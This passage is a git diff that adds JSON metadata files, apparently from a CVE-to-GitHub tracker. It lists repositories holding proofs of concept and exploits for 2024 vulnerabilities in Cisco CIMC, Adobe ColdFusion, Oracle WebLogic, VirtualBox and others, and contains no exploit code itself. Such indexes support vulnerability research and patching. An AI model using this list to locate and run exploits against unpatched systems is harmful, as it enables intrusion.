+ "description": "This is a proof of concept for CVE-2024-20356, a Command Injection vulnerability in Cisco's CIMC.",
+ "fork": false,
+ "created_at": "2024-04-12T15:07:42Z",
+ "updated_at": "2024-06-07T14:58:23Z",
+ "pushed_at": "2024-04-18T14:31:34Z",
+ "stargazers_count": 43,
+ "watchers_count": 43,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cimc",
+ "cisco",
+ "cve-2024-20356"
+ ],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 43,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 803051557,
+ "name": "CVE_2024_20356",
+ "full_name": "SherllyNeo\/CVE_2024_20356",
+ "owner": {
+ "login": "SherllyNeo",
+ "id": 104321419,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104321419?v=4",
+ "html_url": "https:\/\/github.com\/SherllyNeo"
+ },
+ "html_url": "https:\/\/github.com\/SherllyNeo\/CVE_2024_20356",
+ "description": "A oxidized version of https:\/\/github.com\/nettitude\/CVE-2024-20356\/blob\/main\/CVE-2024-20356.py",
+ "fork": false,
+ "created_at": "2024-05-20T00:57:01Z",
+ "updated_at": "2024-05-30T15:05:41Z",
+ "pushed_at": "2024-05-27T17:54:28Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-20404.json b/2024/CVE-2024-20404.json
new file mode 100644
index 0000000000..def78e374e
--- /dev/null
+++ b/2024/CVE-2024-20404.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 812743717,
+ "name": "CVE-2024-20404",
+ "full_name": "AbdElRahmanEzzat1995\/CVE-2024-20404",
+ "owner": {
+ "login": "AbdElRahmanEzzat1995",
+ "id": 67908228,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67908228?v=4",
+ "html_url": "https:\/\/github.com\/AbdElRahmanEzzat1995"
+ },
+ "html_url": "https:\/\/github.com\/AbdElRahmanEzzat1995\/CVE-2024-20404",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-09T18:50:59Z",
+ "updated_at": "2024-06-09T18:52:00Z",
+ "pushed_at": "2024-06-09T18:51:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-20405.json b/2024/CVE-2024-20405.json
new file mode 100644
index 0000000000..fe051cf480
--- /dev/null
+++ b/2024/CVE-2024-20405.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 812744797,
+ "name": "CVE-2024-20405",
+ "full_name": "AbdElRahmanEzzat1995\/CVE-2024-20405",
+ "owner": {
+ "login": "AbdElRahmanEzzat1995",
+ "id": 67908228,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67908228?v=4",
+ "html_url": "https:\/\/github.com\/AbdElRahmanEzzat1995"
+ },
+ "html_url": "https:\/\/github.com\/AbdElRahmanEzzat1995\/CVE-2024-20405",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-09T18:55:03Z",
+ "updated_at": "2024-06-11T01:50:57Z",
+ "pushed_at": "2024-06-09T18:55:44Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-2054.json b/2024/CVE-2024-2054.json
new file mode 100644
index 0000000000..54a9a1f509
--- /dev/null
+++ b/2024/CVE-2024-2054.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 777085087,
+ "name": "CVE-2024-2054",
+ "full_name": "Madan301\/CVE-2024-2054",
+ "owner": {
+ "login": "Madan301",
+ "id": 111639304,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111639304?v=4",
+ "html_url": "https:\/\/github.com\/Madan301"
+ },
+ "html_url": "https:\/\/github.com\/Madan301\/CVE-2024-2054",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-25T07:01:59Z",
+ "updated_at": "2024-03-26T05:40:44Z",
+ "pushed_at": "2024-03-26T18:33:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-20656.json b/2024/CVE-2024-20656.json
new file mode 100644
index 0000000000..b2d369c104
--- /dev/null
+++ b/2024/CVE-2024-20656.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 742476162,
+ "name": "CVE-2024-20656",
+ "full_name": "Wh04m1001\/CVE-2024-20656",
+ "owner": {
+ "login": "Wh04m1001",
+ "id": 44291883,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44291883?v=4",
+ "html_url": "https:\/\/github.com\/Wh04m1001"
+ },
+ "html_url": "https:\/\/github.com\/Wh04m1001\/CVE-2024-20656",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-12T15:08:01Z",
+ "updated_at": "2024-06-20T01:01:28Z",
+ "pushed_at": "2024-01-14T07:14:33Z",
+ "stargazers_count": 115,
+ "watchers_count": 115,
+ "has_discussions": false,
+ "forks_count": 16,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 16,
+ "watchers": 115,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-206565.json b/2024/CVE-2024-206565.json
new file mode 100644
index 0000000000..a93b96419f
--- /dev/null
+++ b/2024/CVE-2024-206565.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 759748409,
+ "name": "sumkaluissessss",
+ "full_name": "sanderswannalive\/sumkaluissessss",
+ "owner": {
+ "login": "sanderswannalive",
+ "id": 50711470,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50711470?v=4",
+ "html_url": "https:\/\/github.com\/sanderswannalive"
+ },
+ "html_url": "https:\/\/github.com\/sanderswannalive\/sumkaluissessss",
+ "description": "CVE-2024-206565",
+ "fork": false,
+ "created_at": "2024-02-19T09:06:06Z",
+ "updated_at": "2024-02-22T14:52:06Z",
+ "pushed_at": "2024-02-19T10:02:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-20666.json b/2024/CVE-2024-20666.json
new file mode 100644
index 0000000000..64c0eaa69f
--- /dev/null
+++ b/2024/CVE-2024-20666.json
@@ -0,0 +1,38 @@
+[
+ {
+ "id": 758035634,
+ "name": "Script-For-CVE-2024-20666",
+ "full_name": "nnotwen\/Script-For-CVE-2024-20666",
+ "owner": {
+ "login": "nnotwen",
+ "id": 112250334,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112250334?v=4",
+ "html_url": "https:\/\/github.com\/nnotwen"
+ },
+ "html_url": "https:\/\/github.com\/nnotwen\/Script-For-CVE-2024-20666",
+ "description": " PowerShell script that can help you automate updating the Windows Recovery Environment (WinRE) on deployed devices to address the security vulnerabilities in CVE-2024-20666.",
+ "fork": false,
+ "created_at": "2024-02-15T13:53:21Z",
+ "updated_at": "2024-05-26T07:29:26Z",
+ "pushed_at": "2024-02-15T14:08:50Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "microsoft",
+ "patch",
+ "script",
+ "update",
+ "vulnerabilities"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-20696.json b/2024/CVE-2024-20696.json
new file mode 100644
index 0000000000..cea4b3c3a2
--- /dev/null
+++ b/2024/CVE-2024-20696.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 768940221,
+ "name": "CVE-2024-20696",
+ "full_name": "clearbluejar\/CVE-2024-20696",
+ "owner": {
+ "login": "clearbluejar",
+ "id": 3752074,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3752074?v=4",
+ "html_url": "https:\/\/github.com\/clearbluejar"
+ },
+ "html_url": "https:\/\/github.com\/clearbluejar\/CVE-2024-20696",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-08T02:31:41Z",
+ "updated_at": "2024-06-13T12:54:50Z",
+ "pushed_at": "2024-03-12T13:33:58Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-20698.json b/2024/CVE-2024-20698.json
new file mode 100644
index 0000000000..a4d3610765
--- /dev/null
+++ b/2024/CVE-2024-20698.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 744332003,
+ "name": "CVE-2024-20698",
+ "full_name": "RomanRybachek\/CVE-2024-20698",
+ "owner": {
+ "login": "RomanRybachek",
+ "id": 64448710,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64448710?v=4",
+ "html_url": "https:\/\/github.com\/RomanRybachek"
+ },
+ "html_url": "https:\/\/github.com\/RomanRybachek\/CVE-2024-20698",
+ "description": "Analysis of the vulnerability",
+ "fork": false,
+ "created_at": "2024-01-17T04:35:42Z",
+ "updated_at": "2024-06-21T00:11:55Z",
+ "pushed_at": "2024-01-23T16:30:55Z",
+ "stargazers_count": 44,
+ "watchers_count": 44,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "integer-overflow",
+ "ntoskrnl",
+ "reverse-engineering",
+ "vulnerability",
+ "windows"
+ ],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 44,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-2074.json b/2024/CVE-2024-2074.json
new file mode 100644
index 0000000000..aca68ff3c3
--- /dev/null
+++ b/2024/CVE-2024-2074.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 765177004,
+ "name": "CVE-2024-2074",
+ "full_name": "yuziiiiiiiiii\/CVE-2024-2074",
+ "owner": {
+ "login": "yuziiiiiiiiii",
+ "id": 138445912,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/138445912?v=4",
+ "html_url": "https:\/\/github.com\/yuziiiiiiiiii"
+ },
+ "html_url": "https:\/\/github.com\/yuziiiiiiiiii\/CVE-2024-2074",
+ "description": "CVE-2024-2074",
+ "fork": false,
+ "created_at": "2024-02-29T12:30:37Z",
+ "updated_at": "2024-03-04T04:25:28Z",
+ "pushed_at": "2024-02-29T12:37:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-20767.json b/2024/CVE-2024-20767.json
new file mode 100644
index 0000000000..6421655f1f
--- /dev/null
+++ b/2024/CVE-2024-20767.json
@@ -0,0 +1,126 @@
+[
+ {
+ "id": 777601582,
+ "name": "CVE-2024-20767",
+ "full_name": "yoryio\/CVE-2024-20767",
+ "owner": {
+ "login": "yoryio",
+ "id": 134471901,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134471901?v=4",
+ "html_url": "https:\/\/github.com\/yoryio"
+ },
+ "html_url": "https:\/\/github.com\/yoryio\/CVE-2024-20767",
+ "description": "Exploit for CVE-2024-20767 - Adobe ColdFusion",
+ "fork": false,
+ "created_at": "2024-03-26T06:51:08Z",
+ "updated_at": "2024-06-13T01:46:03Z",
+ "pushed_at": "2024-03-26T15:52:49Z",
+ "stargazers_count": 32,
+ "watchers_count": 32,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "adobe",
+ "coldfusion",
+ "cve-2024-20767"
+ ],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 32,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 777677405,
+ "name": "CVE-2024-20767",
+ "full_name": "m-cetin\/CVE-2024-20767",
+ "owner": {
+ "login": "m-cetin",
+ "id": 102237861,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102237861?v=4",
+ "html_url": "https:\/\/github.com\/m-cetin"
+ },
+ "html_url": "https:\/\/github.com\/m-cetin\/CVE-2024-20767",
+ "description": "Proof of Concept for CVE-2024-20767. Arbitrary file read from Adobe ColdFusion ",
+ "fork": false,
+ "created_at": "2024-03-26T10:03:51Z",
+ "updated_at": "2024-04-07T07:25:53Z",
+ "pushed_at": "2024-03-26T10:18:46Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 777932789,
+ "name": "CVE-2024-20767",
+ "full_name": "Chocapikk\/CVE-2024-20767",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-20767",
+ "description": "Exploit Toolkit for Adobe ColdFusion CVE-2024-20767 Vulnerability",
+ "fork": false,
+ "created_at": "2024-03-26T19:17:14Z",
+ "updated_at": "2024-06-21T00:12:15Z",
+ "pushed_at": "2024-03-26T19:21:19Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 780337996,
+ "name": "CVE-2024-20767-Adobe-ColdFusion",
+ "full_name": "Praison001\/CVE-2024-20767-Adobe-ColdFusion",
+ "owner": {
+ "login": "Praison001",
+ "id": 60835238,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4",
+ "html_url": "https:\/\/github.com\/Praison001"
+ },
+ "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-20767-Adobe-ColdFusion",
+ "description": "Exploit for CVE-2024-20767 affecting Adobe ColdFusion",
+ "fork": false,
+ "created_at": "2024-04-01T09:01:30Z",
+ "updated_at": "2024-04-01T18:53:20Z",
+ "pushed_at": "2024-04-01T09:03:31Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-20931.json b/2024/CVE-2024-20931.json
new file mode 100644
index 0000000000..ff0366fd1a
--- /dev/null
+++ b/2024/CVE-2024-20931.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 751635756,
+ "name": "CVE-2024-20931",
+ "full_name": "GlassyAmadeus\/CVE-2024-20931",
+ "owner": {
+ "login": "GlassyAmadeus",
+ "id": 54050849,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54050849?v=4",
+ "html_url": "https:\/\/github.com\/GlassyAmadeus"
+ },
+ "html_url": "https:\/\/github.com\/GlassyAmadeus\/CVE-2024-20931",
+ "description": "The Poc for CVE-2024-20931",
+ "fork": false,
+ "created_at": "2024-02-02T01:58:49Z",
+ "updated_at": "2024-06-11T00:36:00Z",
+ "pushed_at": "2024-02-02T02:05:01Z",
+ "stargazers_count": 71,
+ "watchers_count": 71,
+ "has_discussions": false,
+ "forks_count": 13,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 13,
+ "watchers": 71,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 753453515,
+ "name": "CVE-2024-20931-Poc",
+ "full_name": "Leocodefocus\/CVE-2024-20931-Poc",
+ "owner": {
+ "login": "Leocodefocus",
+ "id": 7281742,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7281742?v=4",
+ "html_url": "https:\/\/github.com\/Leocodefocus"
+ },
+ "html_url": "https:\/\/github.com\/Leocodefocus\/CVE-2024-20931-Poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-06T06:35:07Z",
+ "updated_at": "2024-02-06T15:41:44Z",
+ "pushed_at": "2024-02-07T00:34:30Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 753513515,
+ "name": "CVE-2024-20931_weblogic",
+ "full_name": "ATonysan\/CVE-2024-20931_weblogic",
+ "owner": {
+ "login": "ATonysan",
+ "id": 149130294,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149130294?v=4",
+ "html_url": "https:\/\/github.com\/ATonysan"
+ },
+ "html_url": "https:\/\/github.com\/ATonysan\/CVE-2024-20931_weblogic",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-06T09:21:08Z",
+ "updated_at": "2024-06-15T08:19:03Z",
+ "pushed_at": "2024-02-06T09:49:46Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 753664721,
+ "name": "CVE-2024-20931",
+ "full_name": "dinosn\/CVE-2024-20931",
+ "owner": {
+ "login": "dinosn",
+ "id": 3851678,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3851678?v=4",
+ "html_url": "https:\/\/github.com\/dinosn"
+ },
+ "html_url": "https:\/\/github.com\/dinosn\/CVE-2024-20931",
+ "description": "CVE-2024-20931, this is the bypass of the patch of CVE-2023-21839",
+ "fork": false,
+ "created_at": "2024-02-06T15:09:33Z",
+ "updated_at": "2024-06-24T06:40:58Z",
+ "pushed_at": "2024-02-06T15:56:12Z",
+ "stargazers_count": 48,
+ "watchers_count": 48,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 48,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-21006.json b/2024/CVE-2024-21006.json
new file mode 100644
index 0000000000..722b89f746
--- /dev/null
+++ b/2024/CVE-2024-21006.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 794384312,
+ "name": "CVE-2024-21006",
+ "full_name": "momika233\/CVE-2024-21006",
+ "owner": {
+ "login": "momika233",
+ "id": 56291820,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56291820?v=4",
+ "html_url": "https:\/\/github.com\/momika233"
+ },
+ "html_url": "https:\/\/github.com\/momika233\/CVE-2024-21006",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-01T03:08:48Z",
+ "updated_at": "2024-05-23T08:27:07Z",
+ "pushed_at": "2024-05-05T09:40:22Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-21107.json b/2024/CVE-2024-21107.json
new file mode 100644
index 0000000000..e2b9bef3af
--- /dev/null
+++ b/2024/CVE-2024-21107.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 787760798,
+ "name": "CVE-2024-21107",
+ "full_name": "Alaatk\/CVE-2024-21107",
+ "owner": {
+ "login": "Alaatk",
+ "id": 21007805,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4",
+ "html_url": "https:\/\/github.com\/Alaatk"
+ },
+ "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-21107",
+ "description": "Oracle VM VirtualBox for Windows prior to 7.0.16 - Elevation of Privileges",
+ "fork": false,
+ "created_at": "2024-04-17T06:13:20Z",
+ "updated_at": "2024-04-17T11:51:14Z",
+ "pushed_at": "2024-04-17T06:19:01Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-21111.json b/2024/CVE-2024-21111.json
new file mode 100644
index 0000000000..a4c37a7757
--- /dev/null
+++ b/2024/CVE-2024-21111.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 790047378,
+ "name": "CVE-2024-21111",
+ "full_name": "mansk1es\/CVE-2024-21111",
+ "owner": {
+ "login": "mansk1es",
+ "id": 74832816,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74832816?v=4",
+ "html_url": "https:\/\/github.com\/mansk1es"
+ },
+ "html_url": "https:\/\/github.com\/mansk1es\/CVE-2024-21111",
+ "description": "Oracle VirtualBox Elevation of Privilege (Local Privilege Escalation) Vulnerability",
+ "fork": false,
+ "created_at": "2024-04-22T07:05:04Z",
+ "updated_at": "2024-06-26T03:38:13Z",
+ "pushed_at": "2024-05-09T16:39:55Z",
+ "stargazers_count": 208,
+ "watchers_count": 208,
+ "has_discussions": false,
+ "forks_count": 32,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 32,
+ "watchers": 208,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 801847759,
+ "name": "CVE-2024-21111-del",
+ "full_name": "10cks\/CVE-2024-21111-del",
+ "owner": {
+ "login": "10cks",
+ "id": 47177550,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4",
+ "html_url": "https:\/\/github.com\/10cks"
+ },
+ "html_url": "https:\/\/github.com\/10cks\/CVE-2024-21111-del",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-17T03:09:54Z",
+ "updated_at": "2024-05-17T07:56:14Z",
+ "pushed_at": "2024-05-17T03:13:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 810111483,
+ "name": "CVE-2024-21111",
+ "full_name": "x0rsys\/CVE-2024-21111",
+ "owner": {
+ "login": "x0rsys",
+ "id": 13172129,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13172129?v=4",
+ "html_url": "https:\/\/github.com\/x0rsys"
+ },
+ "html_url": "https:\/\/github.com\/x0rsys\/CVE-2024-21111",
+ "description": "Precompiled binaries for Privilege Escalation in Oracle VM Virtual box prior to 7.0.16",
+ "fork": false,
+ "created_at": "2024-06-04T04:24:47Z",
+ "updated_at": "2024-06-04T17:30:22Z",
+ "pushed_at": "2024-06-04T14:32:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-21305.json b/2024/CVE-2024-21305.json
new file mode 100644
index 0000000000..d3ec1334bf
--- /dev/null
+++ b/2024/CVE-2024-21305.json
@@ -0,0 +1,35 @@
+[
+ {
+ "id": 732514348,
+ "name": "CVE-2024-21305",
+ "full_name": "tandasat\/CVE-2024-21305",
+ "owner": {
+ "login": "tandasat",
+ "id": 1620923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1620923?v=4",
+ "html_url": "https:\/\/github.com\/tandasat"
+ },
+ "html_url": "https:\/\/github.com\/tandasat\/CVE-2024-21305",
+ "description": "Report and exploit of CVE-2024-21305. ",
+ "fork": false,
+ "created_at": "2023-12-16T23:27:34Z",
+ "updated_at": "2024-06-02T09:52:32Z",
+ "pushed_at": "2024-01-14T17:21:42Z",
+ "stargazers_count": 26,
+ "watchers_count": 26,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "hyper-v",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 26,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-21306.json b/2024/CVE-2024-21306.json
new file mode 100644
index 0000000000..869b5a08f8
--- /dev/null
+++ b/2024/CVE-2024-21306.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 783479957,
+ "name": "C-PoC-for-CVE-2024-21306",
+ "full_name": "d4rks1d33\/C-PoC-for-CVE-2024-21306",
+ "owner": {
+ "login": "d4rks1d33",
+ "id": 44416061,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44416061?v=4",
+ "html_url": "https:\/\/github.com\/d4rks1d33"
+ },
+ "html_url": "https:\/\/github.com\/d4rks1d33\/C-PoC-for-CVE-2024-21306",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-08T01:15:21Z",
+ "updated_at": "2024-04-08T23:57:28Z",
+ "pushed_at": "2024-04-08T23:59:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 796468551,
+ "name": "BadBlue",
+ "full_name": "PhucHauDeveloper\/BadBlue",
+ "owner": {
+ "login": "PhucHauDeveloper",
+ "id": 62100779,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62100779?v=4",
+ "html_url": "https:\/\/github.com\/PhucHauDeveloper"
+ },
+ "html_url": "https:\/\/github.com\/PhucHauDeveloper\/BadBlue",
+ "description": "CVE-2024-21306 BadBlue implementation (Using DuckyScript)",
+ "fork": false,
+ "created_at": "2024-05-06T02:05:02Z",
+ "updated_at": "2024-06-19T17:52:30Z",
+ "pushed_at": "2024-05-27T03:31:35Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-21338.json b/2024/CVE-2024-21338.json
new file mode 100644
index 0000000000..e07935e00e
--- /dev/null
+++ b/2024/CVE-2024-21338.json
@@ -0,0 +1,152 @@
+[
+ {
+ "id": 785999615,
+ "name": "CVE-2024-21338",
+ "full_name": "hakaioffsec\/CVE-2024-21338",
+ "owner": {
+ "login": "hakaioffsec",
+ "id": 99059183,
